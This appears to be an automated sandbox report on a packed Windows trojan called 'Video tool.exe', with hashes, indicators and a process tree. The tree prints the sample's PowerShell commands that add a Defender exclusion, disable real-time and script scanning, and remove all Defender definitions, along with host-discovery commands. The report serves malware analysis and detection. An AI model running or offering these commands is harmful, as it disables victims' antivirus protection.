86cde2d508fd21a8bc6b07be3a4aecdc1b0ea403535b38a4f59bba82c0d7172d

Resubmissions

30-10-2024 14:24

241030-rqn7tavflh 10

30-10-2024 13:53

241030-q66alavcmg 10

Analysis

max time kernel
469s
max time network
461s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-10-2024 13:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Video tool.exe
Size

7.5MB
MD5

6a4cdfa563d9e187d86e3f95345af036
SHA1

5319190f5f82b9bfbf15ced2d3f8eea777aa5f46
SHA256

86cde2d508fd21a8bc6b07be3a4aecdc1b0ea403535b38a4f59bba82c0d7172d
SHA512

e225d7ad74845fe8dfaa2e0ad9f721f80df8701d051ccb8585078e2fcdc13c18b536c62a2e6da72bf1629d400c5e6c2815a09cd3afcea868c3b768397df56228
SSDEEP

196608:dkgFbcpwfI9jUC2gYBYv3vbW5+iITm1U6fl:TFbTIH2gYBgDW4TOzd

Score

8^/10

discovery execution upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3188	powershell.exe
2752	powershell.exe
5788	powershell.exe
1920	powershell.exe
3784	powershell.exe
2928	powershell.exe
5000	powershell.exe
5596	powershell.exe
6064	powershell.exe
4488	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 8 IoCs

pid	Process
1704	Video tool.exe
3536	Video tool.exe
3236	Video tool.exe
5728	Video tool.exe
2160	Video tool.exe
1328	Video tool.exe
3896	Video tool.exe
3476	Video tool.exe

Loads dropped DLL 64 IoCs

pid	Process
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3940	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
3536	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
5728	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe
1328	Video tool.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
84	pastebin.com
87	pastebin.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com
360	ip-api.com
369	ip-api.com

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
5580	tasklist.exe
5200	tasklist.exe
2520	tasklist.exe
1620	tasklist.exe
5300	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b93-21.dat	upx
behavioral2/memory/3940-25-0x00007FFDC4410000-0x00007FFDC4AD5000-memory.dmp	upx
behavioral2/files/0x000a000000023b86-27.dat	upx
behavioral2/files/0x000a000000023b91-29.dat	upx
behavioral2/files/0x000a000000023b90-32.dat	upx
behavioral2/memory/3940-48-0x00007FFDDCB80000-0x00007FFDDCB8F000-memory.dmp	upx
behavioral2/files/0x000a000000023b8d-47.dat	upx
behavioral2/files/0x000a000000023b8c-46.dat	upx
behavioral2/files/0x000a000000023b8b-45.dat	upx
behavioral2/files/0x000a000000023b8a-44.dat	upx
behavioral2/files/0x000a000000023b89-43.dat	upx
behavioral2/files/0x000a000000023b88-42.dat	upx
behavioral2/files/0x000a000000023b87-41.dat	upx
behavioral2/files/0x000a000000023b85-40.dat	upx
behavioral2/files/0x000a000000023b98-39.dat	upx
behavioral2/files/0x000a000000023b97-38.dat	upx
behavioral2/memory/3940-37-0x00007FFDD3FD0000-0x00007FFDD3FF5000-memory.dmp	upx
behavioral2/files/0x000a000000023b96-36.dat	upx
behavioral2/files/0x000a000000023b92-33.dat	upx
behavioral2/memory/3940-54-0x00007FFDD3D00000-0x00007FFDD3D2D000-memory.dmp	upx
behavioral2/memory/3940-56-0x00007FFDD4000000-0x00007FFDD401A000-memory.dmp	upx
behavioral2/memory/3940-58-0x00007FFDD3B40000-0x00007FFDD3B64000-memory.dmp	upx
behavioral2/memory/3940-60-0x00007FFDC4010000-0x00007FFDC418F000-memory.dmp	upx
behavioral2/memory/3940-64-0x00007FFDD3F40000-0x00007FFDD3F4D000-memory.dmp	upx
behavioral2/memory/3940-63-0x00007FFDD3CE0000-0x00007FFDD3CF9000-memory.dmp	upx
behavioral2/memory/3940-67-0x00007FFDD39F0000-0x00007FFDD3A23000-memory.dmp	upx
behavioral2/memory/3940-71-0x00007FFDC34F0000-0x00007FFDC35BE000-memory.dmp	upx
behavioral2/memory/3940-74-0x00007FFDC2FB0000-0x00007FFDC34E3000-memory.dmp	upx
behavioral2/memory/3940-79-0x00007FFDD39A0000-0x00007FFDD39AD000-memory.dmp	upx
behavioral2/memory/3940-82-0x00007FFDC2E90000-0x00007FFDC2FAA000-memory.dmp	upx
behavioral2/memory/3940-81-0x00007FFDD4000000-0x00007FFDD401A000-memory.dmp	upx
behavioral2/memory/3940-78-0x00007FFDD3D00000-0x00007FFDD3D2D000-memory.dmp	upx
behavioral2/memory/3940-76-0x00007FFDD3B20000-0x00007FFDD3B34000-memory.dmp	upx
behavioral2/memory/3940-73-0x00007FFDD3FD0000-0x00007FFDD3FF5000-memory.dmp	upx
behavioral2/memory/3940-66-0x00007FFDC4410000-0x00007FFDC4AD5000-memory.dmp	upx
behavioral2/memory/3940-84-0x00007FFDD3B40000-0x00007FFDD3B64000-memory.dmp	upx
behavioral2/memory/3940-106-0x00007FFDC4410000-0x00007FFDC4AD5000-memory.dmp	upx
behavioral2/memory/3940-120-0x00007FFDC2E90000-0x00007FFDC2FAA000-memory.dmp	upx
behavioral2/memory/3940-129-0x00007FFDD39F0000-0x00007FFDD3A23000-memory.dmp	upx
behavioral2/memory/3940-128-0x00007FFDD3CE0000-0x00007FFDD3CF9000-memory.dmp	upx
behavioral2/memory/3940-127-0x00007FFDC4010000-0x00007FFDC418F000-memory.dmp	upx
behavioral2/memory/3940-126-0x00007FFDD3B40000-0x00007FFDD3B64000-memory.dmp	upx
behavioral2/memory/3940-125-0x00007FFDD4000000-0x00007FFDD401A000-memory.dmp	upx
behavioral2/memory/3940-124-0x00007FFDD3D00000-0x00007FFDD3D2D000-memory.dmp	upx
behavioral2/memory/3940-123-0x00007FFDD3F40000-0x00007FFDD3F4D000-memory.dmp	upx
behavioral2/memory/3940-122-0x00007FFDD3FD0000-0x00007FFDD3FF5000-memory.dmp	upx
behavioral2/memory/3940-121-0x00007FFDDCB80000-0x00007FFDDCB8F000-memory.dmp	upx
behavioral2/memory/3940-117-0x00007FFDC2FB0000-0x00007FFDC34E3000-memory.dmp	upx
behavioral2/memory/3940-116-0x00007FFDC34F0000-0x00007FFDC35BE000-memory.dmp	upx
behavioral2/memory/3940-119-0x00007FFDD39A0000-0x00007FFDD39AD000-memory.dmp	upx
behavioral2/memory/3940-118-0x00007FFDD3B20000-0x00007FFDD3B34000-memory.dmp	upx
behavioral2/memory/3536-666-0x00007FFDC01C0000-0x00007FFDC0885000-memory.dmp	upx
behavioral2/memory/3536-685-0x00007FFDDB2B0000-0x00007FFDDB2D5000-memory.dmp	upx
behavioral2/memory/3536-686-0x00007FFDDB2A0000-0x00007FFDDB2AF000-memory.dmp	upx
behavioral2/memory/3536-691-0x00007FFDDB270000-0x00007FFDDB29D000-memory.dmp	upx
behavioral2/memory/3536-692-0x00007FFDDB250000-0x00007FFDDB26A000-memory.dmp	upx
behavioral2/memory/3536-693-0x00007FFDDB220000-0x00007FFDDB244000-memory.dmp	upx
behavioral2/memory/3536-694-0x00007FFDC47D0000-0x00007FFDC494F000-memory.dmp	upx
behavioral2/memory/3536-695-0x00007FFDDB200000-0x00007FFDDB219000-memory.dmp	upx
behavioral2/memory/3536-696-0x00007FFDDB1F0000-0x00007FFDDB1FD000-memory.dmp	upx
behavioral2/memory/3536-697-0x00007FFDD7430000-0x00007FFDD7463000-memory.dmp	upx
behavioral2/memory/3536-700-0x00007FFDD3CC0000-0x00007FFDD3D8E000-memory.dmp	upx
behavioral2/memory/3536-698-0x00007FFDC01C0000-0x00007FFDC0885000-memory.dmp	upx
behavioral2/memory/3536-699-0x00007FFDDB2B0000-0x00007FFDDB2D5000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	taskmgr.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 210935.crdownload:SmartScreen	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1932	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2928	powershell.exe
2928	powershell.exe
2928	powershell.exe
3784	powershell.exe
3784	powershell.exe
3784	powershell.exe
4560	msedge.exe
4560	msedge.exe
4472	msedge.exe
4472	msedge.exe
2656	identity_helper.exe
2656	identity_helper.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
5460	msedge.exe
5460	msedge.exe
3188	powershell.exe
3188	powershell.exe
5000	powershell.exe
5000	powershell.exe
3188	powershell.exe
5000	powershell.exe
5596	powershell.exe
5596	powershell.exe
2752	powershell.exe
2752	powershell.exe
2752	powershell.exe
5596	powershell.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs

pid	Process
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1620	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4008	WMIC.exe
Token: SeSecurityPrivilege	4008	WMIC.exe
Token: SeTakeOwnershipPrivilege	4008	WMIC.exe
Token: SeLoadDriverPrivilege	4008	WMIC.exe
Token: SeSystemProfilePrivilege	4008	WMIC.exe
Token: SeSystemtimePrivilege	4008	WMIC.exe
Token: SeProfSingleProcessPrivilege	4008	WMIC.exe
Token: SeIncBasePriorityPrivilege	4008	WMIC.exe
Token: SeCreatePagefilePrivilege	4008	WMIC.exe
Token: SeBackupPrivilege	4008	WMIC.exe
Token: SeRestorePrivilege	4008	WMIC.exe
Token: SeShutdownPrivilege	4008	WMIC.exe
Token: SeDebugPrivilege	4008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4008	WMIC.exe
Token: SeRemoteShutdownPrivilege	4008	WMIC.exe
Token: SeUndockPrivilege	4008	WMIC.exe
Token: SeManageVolumePrivilege	4008	WMIC.exe
Token: 33	4008	WMIC.exe
Token: 34	4008	WMIC.exe
Token: 35	4008	WMIC.exe
Token: 36	4008	WMIC.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeIncreaseQuotaPrivilege	4008	WMIC.exe
Token: SeSecurityPrivilege	4008	WMIC.exe
Token: SeTakeOwnershipPrivilege	4008	WMIC.exe
Token: SeLoadDriverPrivilege	4008	WMIC.exe
Token: SeSystemProfilePrivilege	4008	WMIC.exe
Token: SeSystemtimePrivilege	4008	WMIC.exe
Token: SeProfSingleProcessPrivilege	4008	WMIC.exe
Token: SeIncBasePriorityPrivilege	4008	WMIC.exe
Token: SeCreatePagefilePrivilege	4008	WMIC.exe
Token: SeBackupPrivilege	4008	WMIC.exe
Token: SeRestorePrivilege	4008	WMIC.exe
Token: SeShutdownPrivilege	4008	WMIC.exe
Token: SeDebugPrivilege	4008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4008	WMIC.exe
Token: SeRemoteShutdownPrivilege	4008	WMIC.exe
Token: SeUndockPrivilege	4008	WMIC.exe
Token: SeManageVolumePrivilege	4008	WMIC.exe
Token: 33	4008	WMIC.exe
Token: 34	4008	WMIC.exe
Token: 35	4008	WMIC.exe
Token: 36	4008	WMIC.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	5300	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4912	WMIC.exe
Token: SeSecurityPrivilege	4912	WMIC.exe
Token: SeTakeOwnershipPrivilege	4912	WMIC.exe
Token: SeLoadDriverPrivilege	4912	WMIC.exe
Token: SeSystemProfilePrivilege	4912	WMIC.exe
Token: SeSystemtimePrivilege	4912	WMIC.exe
Token: SeProfSingleProcessPrivilege	4912	WMIC.exe
Token: SeIncBasePriorityPrivilege	4912	WMIC.exe
Token: SeCreatePagefilePrivilege	4912	WMIC.exe
Token: SeBackupPrivilege	4912	WMIC.exe
Token: SeRestorePrivilege	4912	WMIC.exe
Token: SeShutdownPrivilege	4912	WMIC.exe
Token: SeDebugPrivilege	4912	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4912	WMIC.exe
Token: SeRemoteShutdownPrivilege	4912	WMIC.exe
Token: SeUndockPrivilege	4912	WMIC.exe
Token: SeManageVolumePrivilege	4912	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
4472	msedge.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe
636	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1980 wrote to memory of 3940	1980	Video tool.exe	84
PID 1980 wrote to memory of 3940	1980	Video tool.exe	84
PID 3940 wrote to memory of 3484	3940	Video tool.exe	88
PID 3940 wrote to memory of 3484	3940	Video tool.exe	88
PID 3940 wrote to memory of 2096	3940	Video tool.exe	89
PID 3940 wrote to memory of 2096	3940	Video tool.exe	89
PID 3940 wrote to memory of 2656	3940	Video tool.exe	90
PID 3940 wrote to memory of 2656	3940	Video tool.exe	90
PID 3940 wrote to memory of 2560	3940	Video tool.exe	93
PID 3940 wrote to memory of 2560	3940	Video tool.exe	93
PID 3940 wrote to memory of 4540	3940	Video tool.exe	96
PID 3940 wrote to memory of 4540	3940	Video tool.exe	96
PID 2656 wrote to memory of 4660	2656	cmd.exe	98
PID 2656 wrote to memory of 4660	2656	cmd.exe	98
PID 2560 wrote to memory of 1620	2560	cmd.exe	99
PID 2560 wrote to memory of 1620	2560	cmd.exe	99
PID 3484 wrote to memory of 3784	3484	cmd.exe	100
PID 3484 wrote to memory of 3784	3484	cmd.exe	100
PID 2096 wrote to memory of 2928	2096	cmd.exe	101
PID 2096 wrote to memory of 2928	2096	cmd.exe	101
PID 4540 wrote to memory of 4008	4540	cmd.exe	102
PID 4540 wrote to memory of 4008	4540	cmd.exe	102
PID 4472 wrote to memory of 1680	4472	msedge.exe	114
PID 4472 wrote to memory of 1680	4472	msedge.exe	114
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115
PID 4472 wrote to memory of 3060	4472	msedge.exe	115

C:\Users\Admin\AppData\Local\Temp\Video tool.exe
"C:\Users\Admin\AppData\Local\Temp\Video tool.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1980
- C:\Users\Admin\AppData\Local\Temp\Video tool.exe
  "C:\Users\Admin\AppData\Local\Temp\Video tool.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Video tool.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Video tool.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2096
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ask Hassan for a Tool requierment installation is completed Discord id - unc12in12', 0, 'Done!', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ask Hassan for a Tool requierment installation is completed Discord id - unc12in12', 0, 'Done!', 48+16);close()"
      4⤵
      PID:4660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2560
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffdd36646f8,0x7ffdd3664708,0x7ffdd3664718
  2⤵
  PID:1680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
  2⤵
  PID:3060
